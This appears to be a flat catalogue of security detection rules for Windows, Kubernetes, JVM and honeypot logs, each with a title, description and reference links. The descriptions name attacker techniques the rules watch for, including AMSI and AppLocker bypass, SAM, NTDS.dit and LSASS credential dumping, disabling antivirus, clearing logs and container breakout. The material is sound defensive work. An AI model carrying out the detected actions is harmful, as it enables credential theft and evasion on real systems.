Excel Proxy Executing Regsvr32 With Payload Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
Excel Proxy Executing Regsvr32 With Payload Alternate Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
Office Applications Spawning Wmi Cli Alternate Initial execution of malicious document calls wmic to execute the file with regsvr32 https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
Possible Applocker Bypass Detects execution of executables that can be used to bypass Applocker whitelisting https://github.com/carnal0wnage/ApplicationWhitelistBypassTechniques/blob/b348846a3bd2ff45e3616d63a4c2b4426f84772c/TheList.txt, https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1127.001/T1127.001.md
PowerShell AMSI Bypass Pattern Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload. https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
Base64 Encoded Listing of Shadowcopy Detects base64 encoded listing Win32_Shadowcopy https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar
Malicious Base64 Encoded Powershell Invoke Cmdlets Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
Potential PowerShell Base64 Encoded Shellcode Detects potential powershell Base64 encoded Shellcode https://twitter.com/cyb3rops/status/1063072865992523776
Suspicious Bitsadmin Job via PowerShell Detect download by BITS jobs via PowerShell https://eqllib.readthedocs.io/en/latest/analytics/ec5180c9-721a-460f-bddc-27539a284273.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
Stop Or Remove Antivirus Service Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services. Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/
Potential Xor Encoded PowerShell Command Detects usage of "xor" or "bxor" in combination of a "foreach" loop. This pattern is often found in encoded powershell code and commands as a way to avoid detection https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65
Regsvr32 Anomaly Detects various anomalies in relation to regsvr32.exe https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html, https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
Registry Dump of SAM Creds and Secrets Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets
Renamed PaExec Execution Detects execution of renamed paexec via imphash and executable product string sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc, https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
Renamed PsExec Detects the execution of a renamed PsExec often used by attackers or malware https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks
Renamed PowerShell Detects the execution of a renamed PowerShell often used by attackers or malware https://twitter.com/christophetd/status/1164506034720952320
Renamed Rundll32.exe Execution Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/
Root Certificate Installed Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md
Rundll32 JS RunHTMLApplication Pattern Detects suspicious command line patterns used when rundll32 is used to run JavaScript code http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt, https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
Suspicious Rundll32 Script in CommandLine Detects suspicious process related to rundll32 based on arguments https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52, https://github.com/redcanaryco/atomic-red-team/blob/cd3690b100a495885c407282d0c94c85f48a8a2e/atomics/T1218.011/T1218.011.md
Run from a Zip File Payloads may be compressed, archived, or encrypted in order to avoid detection https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file
Suspicious Add Scheduled Task From User AppData Temp schtasks.exe create task from user AppData\Local\Temp malware analyse https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04
Suspicious Execution of Sc to Delete AV Services Detects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955
Stop Windows Service Detects a Windows service to be stopped None
Suspicious Bitstransfer via PowerShell Detects transferring files from system on a server bitstransfer Powershell cmdlets https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps
Suspicious Cmd Execution via WMI Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement. https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html
Suspicious Characters in CommandLine Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation
Wscript Execution from Non C Drive Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file. https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt, https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/
Process Start From Suspicious Folder Detects process start from rare or uncommon folders like temporary folder or folders that usually don't contain executable files Malware sandbox results
Squirrel Lolbin Detects Possible Squirrel Packages Manager as Lolbin http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/, http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
PsExec Tool Execution Detects PsExec service execution via default service image name https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet
PsExec Service Start Detects a PsExec service start None
Run Whoami as SYSTEM Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation. https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
Winword.exe Loads Suspicious DLL Detects Winword.exe loading a custom DLL using the /l flag https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/
WMI Execution Via Office Process Initial execution of malicious document calls wmic to execute the file with regsvr32 https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
WMI Remote Command Execution An adversary might use WMI to execute commands on a remote system https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/, https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
WMI Reconnaissance List Remote Services An adversary might use WMI to check if a certain Remote Service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md, https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
Windows Update Client LOLBIN Detects code execution via the Windows Update client (wuauclt) https://dtm.uk/wuauclt/
Sysinternals SDelete Registry Keys A General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool. https://github.com/OTRF/detection-hackathon-apt29/issues/9, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.md
Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
Abusing Windows Telemetry For Persistence - Registry Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type. https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/
User Account Hidden By Registry Detect modification for a specific user to prevent that user from being listed on the logon screen https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md
Service Binary in Uncommon Folder Detect the creation of a service with a service binary located in a uncommon directory https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
Disable Microsoft Office Security Features Disable Microsoft Office Security Features by registry https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/, https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/
Adwind RAT / JRAT - Registry Detects javaw.exe in AppData folder as used by Adwind / JRAT https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100, https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf
Office Security Settings Changed Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references) https://twitter.com/inversecos/status/1494174785621819397, https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/, https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/
Potential Persistence Via COM Hijacking From Suspicious Locations Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unusual location. https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)
Potential Persistence Via COM Search Order Hijacking Detects potential COM object hijacking leveraging the COM Search Order https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/
SilentProcessExit Monitor Registration Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/, https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/
Accessing WinAPI in PowerShell for Credentials Dumping Detects Accessing to lsass.exe by Powershell https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario. https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html
Mimikatz Detection LSASS Access Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION "only old versions", 0x0010 PROCESS_VM_READ) https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
PowerShell Execution Detects execution of PowerShell https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html
RClone Execution Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware, https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a, https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone, https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html
Windows Defender Threat Detection Disabled Detects disabling Windows Defender threat protection https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
Domain Trust Discovery Detects a discovery of domain trusts. https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md
Lateral Movement Indicator ConDrv This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. Account Name within the event contains the compromised user account name. This event should to be correlated with 4624 and 4688 for further intrusion context. https://jpcertcc.github.io/ToolAnalysisResultSheet/details/wmiexec-vbs.htm, https://www.fireeye.com/blog/threat-research/2017/08/monitoring-windows-console-activity-part-one.html
Security Event Log Cleared Checks for event id 1102 which indicates the security event log was cleared. https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml
Group Modification Logging Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges. Sigma detects Event ID 4728 indicates a "Member is added to a Security Group". Event ID 4729 indicates a "Member is removed from a Security enabled-group". Event ID 4730 indicates a "Security Group is deleted". The case is not applicable for Unix OS. Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP. https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634
Suspicious Esentutl Use Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. https://lolbas-project.github.io/, https://twitter.com/chadtilbury/status/1264226341408452610
Correct Execution of Nltest.exe The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions. https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm, https://attack.mitre.org/software/S0359/
Rclone Execution via Command Line or PowerShell Detects Rclone which is commonly used by ransomware groups for exfiltration https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/
Activity Related to NTDS.dit Domain Hash Retrieval Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely https://www.swordshield.com/2015/07/getting-hashes-from-ntds-dit-file/, https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/, https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/, https://securingtomorrow.mcafee.com/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/, https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
New Service Uses Double Ampersand in Path Detects a service installation that uses a suspicious double ampersand used in the image path value Internal Research
SAM Dump to AppData Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers None
Django Framework Exceptions Detects suspicious Django web application framework exceptions that could indicate exploitation attempts https://docs.djangoproject.com/en/1.11/ref/exceptions/, https://docs.djangoproject.com/en/1.11/topics/logging/#django-security
Potential JNDI Injection Exploitation In JVM Based Application Detects potential JNDI Injection exploitation. Often coupled with Log4Shell exploitation. https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs, https://secariolabs.com/research/analysing-and-reproducing-poc-for-log4j-2-15-0
Potential Local File Read Vulnerability In JVM Based Application Detects potential local file read vulnerability in JVM based apps. If the exceptions are caused due to user input and contain path traversal payloads then it's a red flag. https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
Potential OGNL Injection Exploitation In JVM Based Application Detects potential OGNL Injection exploitation, which may lead to RCE. OGNL is an expression language that is supported in many JVM based systems. OGNL Injection is the reason for some high profile RCE's such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134) https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
Kubernetes CronJob/Job Modification Detects when a Kubernetes CronJob or Job is created or modified. A Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule. An adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence. https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://www.redhat.com/en/blog/protecting-kubernetes-against-mitre-attck-persistence#technique-33-kubernetes-cronjob
Process Execution Error In JVM Based Application Detects process execution related exceptions in JVM based apps, often relates to RCE https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
Potential XXE Exploitation Attempt In JVM Based Application Detects XML parsing issues, if the application expects to work with XML make sure that the parser is initialized safely. https://rules.sonarsource.com/java/RSPEC-2755, https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing, https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
Kubernetes Admission Controller Modification Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials. https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://security.padok.fr/en/blog/kubernetes-webhook-attackers
Deployment Deleted From Kubernetes Cluster Detects the removal of a deployment from a Kubernetes cluster. This could indicate disruptive activity aiming to impact business operations. https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Data%20destruction/
Kubernetes Events Deleted Detects when events are deleted in Kubernetes. An adversary may delete Kubernetes events in an attempt to evade detection. https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Delete%20K8S%20events/
Potential Remote Command Execution In Pod Container Detects attempts to execute remote commands, within a Pod's container using e.g. the "kubectl exec" command. https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Exec%20into%20container/
Container With A hostPath Mount Created Detects creation of a container with a hostPath mount. A hostPath volume mounts a directory or a file from the node to the container. Attackers who have permissions to create a new pod in the cluster may create one with a writable hostPath volume and chroot to escape to the underlying node. https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Writable%20hostPath%20mount/, https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216
Privileged Container Deployed Detects the creation of a "privileged" container, an action which could be indicative of a threat actor mounting a container breakout attacks. A privileged container is a container that can access the host with all of the root capabilities of the host machine. This allows it to view, interact and modify processes, network operations, IPC calls, the file system, mount points, SELinux configurations etc. as the root user on the host. Various versions of "privileged" containers can be specified, e.g. by setting the securityContext.privileged flag in the resource specification, setting non-standard Linux capabilities, or configuring the hostNetwork/hostPID fields https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Privileged%20container/, https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-kubernetes.html#privilegeescalation-kubernetes-privilegedcontainer, https://www.elastic.co/guide/en/security/current/kubernetes-pod-created-with-hostnetwork.html, https://www.elastic.co/guide/en/security/current/kubernetes-container-created-with-excessive-linux-capabilities.html
Creation Of Pod In System Namespace Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods. System pods, created by controllers such as Deployments or DaemonSets have random suffixes in their names. Attackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection. Deployment of such a backdoor container e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers. https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Pod%20or%20container%20name%20similarily/
RBAC Permission Enumeration Attempt Detects identities attempting to enumerate their Kubernetes RBAC permissions. In the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment. In a Kubernetes cluster, this can be achieved by interacting with the API server, and querying the SelfSubjectAccessReview API via e.g. a "kubectl auth can-i --list" command. This will enumerate the Role-Based Access Controls (RBAC) rules defining the compromised user's authorization. https://www.elastic.co/guide/en/security/current/kubernetes-suspicious-self-subject-review.html
Kubernetes Rolebinding Modification Detects when a Kubernetes Rolebinding is created or modified. https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://medium.com/@seifeddinerajhi/kubernetes-rbac-privilege-escalation-exploits-and-mitigations-26c07629eeab
Kubernetes Secrets Enumeration Detects enumeration of Kubernetes secrets. https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/List%20K8S%20secrets/
Kubernetes Secrets Modified or Deleted Detects when Kubernetes Secrets are Modified or Deleted. https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://commandk.dev/blog/guide-to-audit-k8s-secrets-for-compliance/
New Kubernetes Service Account Created Detects creation of new Kubernetes service account, which could indicate an attacker's attempt to persist within a cluster. https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/container%20service%20account/
Potential Sidecar Injection Into Running Deployment Detects attempts to inject a sidecar container into a running deployment. A sidecar container is an additional container within a pod, that resides alongside the main container. One way to add containers to running resources like Deployments/DeamonSets/StatefulSets, is via a "kubectl patch" operation. By injecting a new container within a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separated pod in the cluster. https://kubernetes.io/docs/tasks/manage-kubernetes-objects/update-api-object-kubectl-patch, https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Sidecar%20Injection/
Kubernetes Unauthorized or Unauthenticated Access Detects when a request to the Kubernetes API is rejected due to lack of authorization or due to an expired authentication token being used. This may indicate an attacker attempting to leverage credentials they have obtained. https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://www.datadoghq.com/blog/monitor-kubernetes-audit-logs/#monitor-api-authentication-issues
Potential RCE Exploitation Attempt In NodeJS Detects process execution related errors in NodeJS. If the exceptions are caused due to user input then they may suggest an RCE vulnerability. https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
OpenCanary - FTP Login Attempt Detects instances where an FTP service on an OpenCanary node has had a login attempt. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - GIT Clone Request Detects instances where a GIT service on an OpenCanary node has had Git Clone request. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - HTTPPROXY Login Attempt Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - HTTP GET Request Detects instances where an HTTP service on an OpenCanary node has received a GET request. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - HTTP POST Login Attempt Detects instances where an HTTP service on an OpenCanary node has had login attempt via Form POST. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - MSSQL Login Attempt Via SQLAuth Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - MSSQL Login Attempt Via Windows Authentication Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - MySQL Login Attempt Detects instances where a MySQL service on an OpenCanary node has had a login attempt. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - NTP Monlist Request Detects instances where an NTP service on an OpenCanary node has had a NTP monlist request. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - REDIS Action Command Attempt Detects instances where a REDIS service on an OpenCanary node has had an action command attempted. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - SIP Request Detects instances where an SIP service on an OpenCanary node has had a SIP request. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - SMB File Open Request Detects instances where an SMB service on an OpenCanary node has had a file open request. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - SNMP OID Request Detects instances where an SNMP service on an OpenCanary node has had an OID request. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - SSH Login Attempt Detects instances where an SSH service on an OpenCanary node has had a login attempt. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - SSH New Connection Attempt Detects instances where an SSH service on an OpenCanary node has had a connection attempt. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - Telnet Login Attempt Detects instances where a Telnet service on an OpenCanary node has had a login attempt. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - TFTP Request Detects instances where a TFTP service on an OpenCanary node has had a request. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
OpenCanary - VNC Connection Attempt Detects instances where a VNC service on an OpenCanary node has had a connection attempt. https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
Python SQL Exceptions Generic rule for SQL exceptions in Python according to PEP 249 https://www.python.org/dev/peps/pep-0249/#exceptions
